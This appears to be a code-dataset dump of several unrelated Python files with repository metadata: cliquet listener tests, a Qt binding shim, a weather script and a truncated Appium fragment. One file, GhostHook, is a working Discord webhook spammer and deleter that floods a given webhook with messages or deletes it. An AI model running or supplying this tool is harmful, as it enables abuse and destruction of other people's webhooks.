hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e2c27c3325a471c439f695d2c7b7452fdcb4a522 | 7,171 | py | Python | cliquet/tests/test_listeners.py | codebyravi/cliquet | 6346dd436b5c553a48da6a3430ffd34fe8c7bcbe | [
"Apache-2.0"
] | 89 | 2015-02-26T07:49:37.000Z | 2019-11-15T01:00:03.000Z | cliquet/tests/test_listeners.py | codebyravi/cliquet | 6346dd436b5c553a48da6a3430ffd34fe8c7bcbe | [
"Apache-2.0"
] | 605 | 2015-02-19T21:45:40.000Z | 2019-03-28T14:11:25.000Z | cliquet/tests/test_listeners.py | codebyravi/cliquet | 6346dd436b5c553a48da6a3430ffd34fe8c7bcbe | [
"Apache-2.0"
] | 33 | 2015-03-18T17:40:00.000Z | 2020-07-13T06:16:48.000Z | # -*- coding: utf-8 -*-
import json
import uuid
from contextlib import contextmanager
from datetime import datetime
import mock
from pyramid import testing
from cliquet import initialization
from cliquet.events import ResourceChanged, ResourceRead, ACTIONS
from cliquet.listeners import ListenerBase
from cliquet.storage.redis import create_from_config
from cliquet.tests.support import unittest
class ListenerSetupTest(unittest.TestCase):
def setUp(self):
redis_patch = mock.patch('cliquet.listeners.redis.load_from_config')
self.addCleanup(redis_patch.stop)
self.redis_mocked = redis_patch.start()
def make_app(self, extra_settings={}):
settings = {
'event_listeners': 'cliquet.listeners.redis',
}
settings.update(**extra_settings)
config = testing.setUp(settings=settings)
config.commit()
initialization.setup_listeners(config)
return config
def test_listener_module_is_specified_via_settings(self):
self.make_app({
'event_listeners': 'redis',
'event_listeners.redis.use': 'cliquet.listeners.redis',
})
self.assertTrue(self.redis_mocked.called)
def test_listener_module_can_be_specified_via_listeners_list(self):
self.make_app()
self.assertTrue(self.redis_mocked.called)
def test_callback_called_when_action_is_not_filtered(self):
config = self.make_app()
event = ResourceChanged(ACTIONS.CREATE, 123456, [], Request())
config.registry.notify(event)
self.assertTrue(self.redis_mocked.return_value.called)
def test_callback_is_not_called_when_action_is_filtered(self):
config = self.make_app({
'event_listeners.redis.actions': 'delete',
})
event = ResourceChanged(ACTIONS.CREATE, 123456, [], Request())
config.registry.notify(event)
self.assertFalse(self.redis_mocked.return_value.called)
def test_callback_called_when_resource_is_not_filtered(self):
config = self.make_app()
event = ResourceChanged(ACTIONS.CREATE, 123456, [], Request())
event.payload['resource_name'] = 'mushroom'
config.registry.notify(event)
self.assertTrue(self.redis_mocked.return_value.called)
def test_callback_is_not_called_when_resource_is_filtered(self):
config = self.make_app({
'event_listeners.redis.resources': 'toad',
})
event = ResourceChanged(ACTIONS.CREATE, 123456, [], Request())
event.payload['resource_name'] = 'mushroom'
config.registry.notify(event)
self.assertFalse(self.redis_mocked.return_value.called)
def test_callback_is_not_called_on_read_by_default(self):
config = self.make_app()
event = ResourceRead(ACTIONS.READ, 123456, [], Request())
config.registry.notify(event)
self.assertFalse(self.redis_mocked.return_value.called)
def test_callback_is_called_on_read_if_specified(self):
config = self.make_app({
'event_listeners.redis.actions': 'read',
})
event = ResourceRead(ACTIONS.READ, 123456, [], Request())
config.registry.notify(event)
self.assertTrue(self.redis_mocked.return_value.called)
def test_same_callback_is_called_for_read_and_write_specified(self):
config = self.make_app({
'event_listeners.redis.actions': 'read create delete',
})
event = ResourceRead(ACTIONS.READ, 123456, [], Request())
config.registry.notify(event)
event = ResourceChanged(ACTIONS.CREATE, 123456, [], Request())
config.registry.notify(event)
self.assertEqual(self.redis_mocked.return_value.call_count, 2)
@contextmanager
def broken_redis():
from redis import StrictRedis
old = StrictRedis.lpush
def push(*args, **kwargs):
raise Exception('boom')
StrictRedis.lpush = push
yield
StrictRedis.lpush = old
UID = str(uuid.uuid4())
class Resource(object):
record_id = UID
timestamp = 123456789
class ViewSet(object):
def get_name(*args, **kw):
return 'collection'
class Service(object):
viewset = ViewSet()
class Match(object):
cornice_services = {'watev': Service()}
pattern = 'watev'
class Request(object):
path = '/1/bucket/collection/'
prefixed_userid = 'tarek'
matchdict = {'id': UID}
registry = matched_route = Match()
current_resource_name = 'bucket'
class ListenerCalledTest(unittest.TestCase):
def setUp(self):
self.config = testing.setUp()
self.config.add_settings({'events_pool_size': 1,
'events_url': 'redis://localhost:6379/0'})
self._redis = create_from_config(self.config, prefix='events_')
self._size = 0
def _save_redis(self):
self._size = self._redis.llen('cliquet.events')
def has_redis_changed(self):
return self._redis.llen('cliquet.events') > self._size
def notify(self, event):
self._save_redis()
self.config.registry.notify(event)
@contextmanager
def redis_listening(self):
config = self.config
listener = 'cliquet.listeners.redis'
# setting up the redis listener
with mock.patch.dict(config.registry.settings,
[('event_listeners', listener),
('event_listeners.redis.pool_size', '1')]):
initialization.setup_listeners(config)
config.commit()
yield
def test_redis_is_notified(self):
with self.redis_listening():
# let's trigger an event
event = ResourceChanged(ACTIONS.CREATE, 123456, [], Request())
self.notify(event)
self.assertTrue(self.has_redis_changed())
# okay, we should have the first event in Redis
last = self._redis.lpop('cliquet.events')
last = json.loads(last.decode('utf8'))
self.assertEqual(last['action'], ACTIONS.CREATE.value)
def test_notification_is_broken(self):
with self.redis_listening():
# an event with a bad JSON should silently break and send nothing
# date time objects cannot be dumped
event2 = ResourceChanged(ACTIONS.CREATE,
datetime.now(),
[],
Request())
self.notify(event2)
self.assertFalse(self.has_redis_changed())
def test_redis_is_broken(self):
with self.redis_listening():
# if the redis call fails, same deal: we should ignore it
self._save_redis()
with broken_redis():
event = ResourceChanged(ACTIONS.CREATE, 123456, [], Request())
self.config.registry.notify(event)
self.assertFalse(self.has_redis_changed())
class ListenerBaseTest(unittest.TestCase):
def test_not_implemented(self):
# make sure we can't use the base listener
listener = ListenerBase()
self.assertRaises(NotImplementedError, listener, object())
| 32.447964 | 78 | 0.649979 | 795 | 7,171 | 5.647799 | 0.238994 | 0.03608 | 0.033408 | 0.055679 | 0.438085 | 0.389532 | 0.361025 | 0.312695 | 0.293987 | 0.292428 | 0 | 0.015544 | 0.246409 | 7,171 | 220 | 79 | 32.595455 | 0.815322 | 0.044066 | 0 | 0.371069 | 0 | 0 | 0.083991 | 0.047911 | 0 | 0 | 0 | 0 | 0.08805 | 1 | 0.144654 | false | 0 | 0.075472 | 0.012579 | 0.358491 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2c2f8ba329df746295b2ad639358341171d0025 | 9,753 | py | Python | GhostHooksrc.py | UiIsBack/GhostHook | 1118757b604f8325f6d066a51c2fcd7d8d8686a4 | [
"Apache-2.0"
] | 7 | 2022-03-05T14:37:58.000Z | 2022-03-20T03:32:02.000Z | GhostHooksrc.py | UiIsBack/GhostHook | 1118757b604f8325f6d066a51c2fcd7d8d8686a4 | [
"Apache-2.0"
] | null | null | null | GhostHooksrc.py | UiIsBack/GhostHook | 1118757b604f8325f6d066a51c2fcd7d8d8686a4 | [
"Apache-2.0"
] | 1 | 2022-03-11T22:54:48.000Z | 2022-03-11T22:54:48.000Z |
import os
os.system(f'cls & mode 85,20 & title GhostHook! - Version 1.4!')
from json import loads, dumps
from threading import Thread
from time import sleep
from sys import argv
import pystyle
from pystyle import *
import time
import requests
from colorama import Fore
import threading
import sys
def main():
image = """
,%@&(
@@@@@@@@@@@@@%
.@@@@@@@@@@@@@@@@@(
@@@@@@@@@@@@@@@@@@@#
(@@@@@& @@@@ @@@@@@.
@@@@& @@@* @@@@@( @@@@@@@@
, / ,@@@. *@@@@@* @@@@@& @@@@@ @@/ @&
@@@@@@@@@ /@@@@@@@@@@@@@@@@@@@@ &@& @* @@ #%
@@ @@.&@@(@@@@ (@@@@@@# ,.@@@@@@@@@ &@@( % @
@ ,@/ @* &@@@@@@@@@@@, @@@@% ((@@@@@@@@@@@@ /&
#( &@# &@@@@@@@@@@@&@@@@@@@@# @@@@@@@@@@,
&@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@
&@@@@@@@@@@@@@@@@@@@@@#&@@@@@@@@@@@
&. /@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ /@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,/
, #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ //
, (,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ @ @@@@@@@@@@@@@@@@@@@@@@@@@%
,(# * *@#@@@@@@@@@@@@@@@@@@ & @
@%@@@@@@@@@@@@@@@@@/ ..
@@@@@@@@@@@@@@@@@@#
*.@@@@@@@@@@@@@@@&,
#%@@/ @@@@@@@@ @
%.*@ *@@@@@@@ (
( @ @@@@@@
@ &@@@@@
@ @@@.@
#@*
/@*
&@
"""
Anime.Fade(Center.Center(image), Colors.purple_to_blue, Colorate.Vertical, interval=0.025, enter=True)
print(Colorate.Horizontal(Colors.purple_to_blue, Center.XCenter(image)))
name = """
d888b db db .d88b. .d8888. d888888b db db .d88b. .d88b. db dD
88' Y8b 88 88 .8P Y8. 88' YP `~~88~~' 88 88 .8P Y8. .8P Y8. 88 ,8P'
88 88ooo88 88 88 `8bo. 88 88ooo88 88 88 88 88 88,8P
88 ooo 88~~~88 88 88 `Y8b. 88 88~~~88 88 88 88 88 88`8b
88. ~8~ 88 88 `8b d8' db 8D 88 88 88 `8b d8' `8b d8' 88 `88.
Y888P YP YP `Y88P' `8888Y' YP YP YP `Y88P' `Y88P' YP YD
https://ghostt.ga Version 1.4
─═══════════════════════════════════☆☆═══════════════════════════════════─
loading ghosthook || webhook spammer
─═══════════════════════════════════☆☆═══════════════════════════════════─
"""
#wow
Anime.Fade(Center.Center(name), Colors.purple_to_blue, Colorate.Vertical, interval=0.025, enter=True)
print(Colorate.Horizontal(Colors.purple_to_blue, Center.XCenter(name)))
webhook_url = Write.Input("webhook>", Colors.purple_to_blue, interval=0.008)
r = requests.get(webhook_url)
if r.status_code == 200:
print(f"{Fore.GREEN}Webhook working{Fore.RESET}")
time.sleep(1)
else:
print(f"{Fore.RED}[404] Webhook Invalid{Fore.RESET}")
time.sleep(30000000000000000000000000000000000000000000000000000000000000000000000000)
Write.Print('1. Webhook Deleter 2. Webhook Spammer\n', Colors.purple, interval=0)
def deelhook():
#deletes webhook
result = requests.request(method="DELETE", url=webhook_url)
try:
result.raise_for_status()
except requests.exceptions.HTTPError as err:
print(f"{Fore.RED}[{Fore.GREEN}!{Fore.RED}]{Fore.GREEN} " + str(err))
else:
Write.Print(f" Webhook successfully deleted\n [{result.status_code}]", Colors.red, interval=0)
time.sleep(3)
def hooks():
msg = Write.Input(f"message-> ", Colors.purple_to_blue, interval=0.008)
namehook = Write.Input(f"webhook name-> ", Colors.blue_to_purple, interval=0.008)
theard = int(Write.Input(f"amount of messages-> ", Colors.blue_to_cyan))
discordavurl = Write.Input(f"Enter Avatar Url leave blank for default [>]", Colors.cyan_to_blue, interval= 0.008)
footer = Write.Input(f"Embed Footer [>]", Colors.cyan_to_blue, interval= 0.008)
maincon = Write.Input(f"embed content [>]", Colors.cyan_to_blue, interval= 0.008)
embedauth = Write.Input(f"embed author [>]", Colors.cyan_to_blue, interval= 0.008 )
Write.Print('spam starting...\n', Colors.green, interval=0)
time.sleep(2)
embeds = []
embed = {
"color": 12208895,
"fields": [
{
"name": "**Nice Webhook**",
"value": f'{maincon}',
"inline": True
},
],
"author": {
"name": f"{embedauth}",
"icon_url": discordavurl
},
"footer": {
"text": f"{footer}"
}
}
embeds.append(embed)
#setting up
os.system('cls')
os.system('cls')
defaulthookname = 'ui!'
defaultmessage = 'c '
defaultav = 'https://www.kindpng.com/picc/m/103-1038268_not-scary-cartoon-ghost-hd-png-download.png'
if discordavurl == '':
discordavurl = defaultav
print(" ")
hookname = namehook
data = {
"content": msg,
"embeds": embeds,
"username": namehook,
"avatar_url": discordavurl
}
webhook = webhook_url
for x in range(theard):
response = requests.post(url=webhook, json=data)
try:
if response.status_code == 204 or response.status_code == 200:
Write.Print(f"Message sent\n", Colors.green_to_cyan, interval= 0)
elif response.status_code == 429:
Write.Print(f"Rate limited ({response.json()['retry_after']}ms)\n", Colors.red_to_yellow, interval= 0)
time.sleep(response.json()["retry_after"] / 1000)
elif response.status_code == 404:
Write.Print(f"Webhook Deleted)\n", Colors.red_to_black, interval= 0)
time.sleep(3)
break
else:
Write.Print(f"Error : {response.status_code}!\n", Colors.red_to_green, interval= 0)
time.sleep(.01)
break
except KeyboardInterrupt:
break
Write.Print("Spam Ended", Colors.blue, interval=0.08)
time.sleep(0.75)
print(" ")
print(" ")
os.system('cls')
hookname = namehook
if hookname == '':
hookname = defaulthookname
print(" ")
print(f'you enterd nothing name set to {defaulthookname}')
print(" ")
message = msg
if message == '':
message = defaultmessage
print(" ")
print(f'you entered nothing msg set to {defaultmessage}')
try:
print(" ")
threads = theard
if threads < 1:
print(" ")
print(f"you didn't set any threads threads set to 1")
threads = 1
except ValueError:
threads = 1
print(" ")
print(f'Invalid threads / Setting to 1.')
print(" ")
gh = input(f"{Fore.RED}[+]{Fore.RESET}{Fore.MAGENTA}")
if gh == '1':
deelhook()
main()
elif gh == '2':
hooks()
main()
else:
Write.Print(f"enter either 1 or 2! not {gh}", Colors.red, interval=0)
time.sleep(3)
main()
main()
| 36.803774 | 127 | 0.347073 | 732 | 9,753 | 4.758197 | 0.289617 | 0.025266 | 0.022394 | 0.018375 | 0.165088 | 0.132644 | 0.132644 | 0.06259 | 0.06259 | 0.06259 | 0 | 0.064824 | 0.484364 | 9,753 | 264 | 128 | 36.943182 | 0.59833 | 0.002871 | 0 | 0.205405 | 0 | 0.021622 | 0.475354 | 0.069494 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016216 | false | 0 | 0.064865 | 0 | 0.081081 | 0.102703 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2c416a4bb316127137c72ec92b16939e3cadcdc | 8,142 | py | Python | pyblish_starter/vendor/Qt.py | pyblish/pyblish-starter | 7d0ed4769737271685838c9d5348c22bc17e7506 | [
"MIT"
] | 17 | 2016-09-27T06:48:03.000Z | 2021-05-29T13:23:12.000Z | pyblish_starter/vendor/Qt.py | pyblish/pyblish-starter | 7d0ed4769737271685838c9d5348c22bc17e7506 | [
"MIT"
] | 7 | 2016-09-22T06:17:48.000Z | 2020-03-22T01:46:53.000Z | pyblish_starter/vendor/Qt.py | pyblish/pyblish-starter | 7d0ed4769737271685838c9d5348c22bc17e7506 | [
"MIT"
] | 7 | 2016-09-27T14:10:58.000Z | 2022-02-09T13:18:15.000Z | """Map all bindings to PySide2
This module replaces itself with the most desirable binding.
Project goals:
Qt.py was born in the film and visual effects industry to address
the growing need for the development of software capable of running
with more than one flavour of the Qt bindings for Python - PySide,
PySide2, PyQt4 and PyQt5.
1. Build for one, run with all
2. Explicit is better than implicit
3. Support co-existence
Default resolution order:
- PySide2
- PyQt5
- PySide
- PyQt4
Usage:
>>> import sys
>>> from Qt import QtWidgets
>>> app = QtWidgets.QApplication(sys.argv)
>>> button = QtWidgets.QPushButton("Hello World")
>>> button.show()
>>> app.exec_()
"""
import os
import sys
__version__ = "0.4.3"
# All unique members of Qt.py
__added__ = list()
# Members copied from elsewhere, such as QtGui -> QtWidgets
__remapped__ = list()
# Existing members modified in some way
__modified__ = list()
def remap(object, name, value, safe=True):
"""Prevent accidental assignment of existing members
Arguments:
object (object): Parent of new attribute
name (str): Name of new attribute
value (object): Value of new attribute
safe (bool): Whether or not to guarantee that
the new attribute was not overwritten.
Can be set to False under condition that
it is superseded by extensive testing.
"""
if os.getenv("QT_TESTING") is not None and safe:
# Cannot alter original binding.
if hasattr(object, name):
raise AttributeError("Cannot override existing name: "
"%s.%s" % (object.__name__, name))
# Cannot alter classes of functions
if type(object).__name__ != "module":
raise AttributeError("%s != 'module': Cannot alter "
"anything but modules" % object)
elif hasattr(object, name):
# Keep track of modifications
__modified__.append(name)
if name not in __added__:
__remapped__.append(name)
setattr(object, name, value)
def add(object, name, value, safe=True):
"""Identical to :func:`remap` and provided for readability only"""
__added__.append(name)
remap(object, name, value, safe)
def pyqt5():
import PyQt5.Qt
from PyQt5 import QtCore, uic
remap(QtCore, "Signal", QtCore.pyqtSignal)
remap(QtCore, "Slot", QtCore.pyqtSlot)
remap(QtCore, "Property", QtCore.pyqtProperty)
add(PyQt5, "__wrapper_version__", __version__)
add(PyQt5, "__binding__", "PyQt5")
add(PyQt5, "__binding_version__", QtCore.PYQT_VERSION_STR)
add(PyQt5, "__qt_version__", QtCore.QT_VERSION_STR, safe=False)
add(PyQt5, "__added__", __added__)
add(PyQt5, "__remapped__", __remapped__)
add(PyQt5, "__modified__", __modified__)
add(PyQt5, "load_ui", lambda fname: uic.loadUi(fname))
return PyQt5
def pyqt4():
# Attempt to set sip API v2 (must be done prior to importing PyQt4)
import sip
try:
sip.setapi("QString", 2)
sip.setapi("QVariant", 2)
sip.setapi("QDate", 2)
sip.setapi("QDateTime", 2)
sip.setapi("QTextStream", 2)
sip.setapi("QTime", 2)
sip.setapi("QUrl", 2)
except AttributeError:
raise ImportError
# PyQt4 < v4.6
except ValueError:
# API version already set to v1
raise ImportError
import PyQt4.Qt
from PyQt4 import QtCore, QtGui, uic
remap(PyQt4, "QtWidgets", QtGui)
remap(QtCore, "Signal", QtCore.pyqtSignal)
remap(QtCore, "Slot", QtCore.pyqtSlot)
remap(QtCore, "Property", QtCore.pyqtProperty)
remap(QtCore, "QItemSelection", QtGui.QItemSelection)
remap(QtCore, "QStringListModel", QtGui.QStringListModel)
remap(QtCore, "QItemSelectionModel", QtGui.QItemSelectionModel)
remap(QtCore, "QSortFilterProxyModel", QtGui.QSortFilterProxyModel)
remap(QtCore, "QAbstractProxyModel", QtGui.QAbstractProxyModel)
try:
from PyQt4 import QtWebKit
remap(PyQt4, "QtWebKitWidgets", QtWebKit)
except ImportError:
# QtWebkit is optional in Qt , therefore might not be available
pass
add(PyQt4, "__wrapper_version__", __version__)
add(PyQt4, "__binding__", "PyQt4")
add(PyQt4, "__binding_version__", QtCore.PYQT_VERSION_STR)
add(PyQt4, "__qt_version__", QtCore.QT_VERSION_STR)
add(PyQt4, "__added__", __added__)
add(PyQt4, "__remapped__", __remapped__)
add(PyQt4, "__modified__", __modified__)
add(PyQt4, "load_ui", lambda fname: uic.loadUi(fname))
return PyQt4
def pyside2():
import PySide2
from PySide2 import QtGui, QtCore, QtUiTools
remap(QtCore, "QStringListModel", QtGui.QStringListModel)
add(PySide2, "__wrapper_version__", __version__)
add(PySide2, "__binding__", "PySide2")
add(PySide2, "__binding_version__", PySide2.__version__)
add(PySide2, "__qt_version__", PySide2.QtCore.qVersion())
add(PySide2, "__added__", __added__)
add(PySide2, "__remapped__", __remapped__)
add(PySide2, "__modified__", __modified__)
add(PySide2, "load_ui", lambda fname: QtUiTools.QUiLoader().load(fname))
return PySide2
def pyside():
import PySide
from PySide import QtGui, QtCore, QtUiTools
remap(PySide, "QtWidgets", QtGui)
remap(QtCore, "QSortFilterProxyModel", QtGui.QSortFilterProxyModel)
remap(QtCore, "QStringListModel", QtGui.QStringListModel)
remap(QtCore, "QItemSelection", QtGui.QItemSelection)
remap(QtCore, "QItemSelectionModel", QtGui.QItemSelectionModel)
remap(QtCore, "QAbstractProxyModel", QtGui.QAbstractProxyModel)
try:
from PySide import QtWebKit
remap(PySide, "QtWebKitWidgets", QtWebKit)
except ImportError:
# QtWebkit is optional in Qt , therefore might not be available
pass
add(PySide, "__wrapper_version__", __version__)
add(PySide, "__binding__", "PySide")
add(PySide, "__binding_version__", PySide.__version__)
add(PySide, "__qt_version__", PySide.QtCore.qVersion())
add(PySide, "__added__", __added__)
add(PySide, "__remapped__", __remapped__)
add(PySide, "__modified__", __modified__)
add(PySide, "load_ui", lambda fname: QtUiTools.QUiLoader().load(fname))
return PySide
def log(text, verbose):
if verbose:
sys.stdout.write(text)
def init():
"""Try loading each binding in turn
Please note: the entire Qt module is replaced with this code:
sys.modules["Qt"] = binding()
This means no functions or variables can be called after
this has executed.
"""
preferred = os.getenv("QT_PREFERRED_BINDING")
verbose = os.getenv("QT_VERBOSE") is not None
bindings = (pyside2, pyqt5, pyside, pyqt4)
if preferred:
# Internal flag (used in installer)
if preferred == "None":
sys.modules[__name__].__wrapper_version__ = __version__
return
preferred = preferred.split(os.pathsep)
available = {
"PySide2": pyside2,
"PyQt5": pyqt5,
"PySide": pyside,
"PyQt4": pyqt4
}
try:
bindings = [available[binding] for binding in preferred]
except KeyError:
raise ImportError(
"Available preferred Qt bindings: "
"\n".join(preferred)
)
for binding in bindings:
log("Trying %s" % binding.__name__, verbose)
try:
binding = binding()
except ImportError as e:
log(" - ImportError(\"%s\")\n" % e, verbose)
continue
else:
# Reference to this module
binding.__shim__ = sys.modules[__name__]
sys.modules.update({
__name__: binding,
# Fix #133, `from Qt.QtWidgets import QPushButton`
__name__ + ".QtWidgets": binding.QtWidgets
})
return
# If not binding were found, throw this error
raise ImportError("No Qt binding were found.")
init()
| 29.5 | 76 | 0.648735 | 902 | 8,142 | 5.538803 | 0.278271 | 0.03743 | 0.01201 | 0.019215 | 0.281025 | 0.244996 | 0.234187 | 0.113291 | 0.098479 | 0.078463 | 0 | 0.013423 | 0.249693 | 8,142 | 275 | 77 | 29.607273 | 0.804387 | 0.243675 | 0 | 0.196078 | 0 | 0 | 0.168812 | 0.006931 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052288 | false | 0.013072 | 0.137255 | 0 | 0.228758 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2c5a70bc31179b591d0599334c26264e4b70aca | 676 | py | Python | .config/polybar/scripts/weather/weather.py | XECortex/dots | ce07f010b2ba80b8105b5bf7786f54df9048ec81 | [
"MIT"
] | 3 | 2021-02-18T17:59:17.000Z | 2021-02-19T19:54:18.000Z | .config/polybar/scripts/weather/weather.py | XECortex/dots | ce07f010b2ba80b8105b5bf7786f54df9048ec81 | [
"MIT"
] | null | null | null | .config/polybar/scripts/weather/weather.py | XECortex/dots | ce07f010b2ba80b8105b5bf7786f54df9048ec81 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
import requests
path = os.path.dirname(os.path.realpath(__file__))
if not os.path.isfile(f"{path}/config.py"):
print(f"⚠ No weather config found. Check out \"{path}/config.py\"")
exit()
else:
from config import *
url = f"https://api.openweathermap.org/data/2.5/weather?id={city}&appid={key}&units={units}&lang={lang}"
res = requests.get(url)
icon = icons.get(res.json().get('weather')[0]['icon'], "")
temp = round(res.json().get('main')['temp'], 1)
if res.json().get('weather')[0]['icon'].endswith('n'):
icon_color = color_night
else:
icon_color = color_day
print(f"%{{F{icon_color}}}" + icon + "%{F-}", temp, symbol) | 28.166667 | 104 | 0.647929 | 109 | 676 | 3.954128 | 0.53211 | 0.041763 | 0.069606 | 0.078886 | 0.102088 | 0.102088 | 0 | 0 | 0 | 0 | 0 | 0.008403 | 0.119822 | 676 | 24 | 105 | 28.166667 | 0.712605 | 0.029586 | 0 | 0.117647 | 0 | 0.058824 | 0.310976 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.176471 | 0 | 0.176471 | 0.117647 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2c72ceb88a1e9c682a071477b57dcf4d8d544d4 | 1,074 | py | Python | util/driver.py | youran1024/AutoTest | 91925ea69f87acc9718674e483dfac61bbcc6dbf | [
"MIT"
] | 1 | 2018-12-13T06:43:15.000Z | 2018-12-13T06:43:15.000Z | util/driver.py | youran1024/AutoTest | 91925ea69f87acc9718674e483dfac61bbcc6dbf | [
"MIT"
] | null | null | null | util/driver.py | youran1024/AutoTest | 91925ea69f87acc9718674e483dfac61bbcc6dbf | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from appium import webdriver
server_base = "http://127.0.0.1:"
server_end = "/wd/hub"
capabilities = {
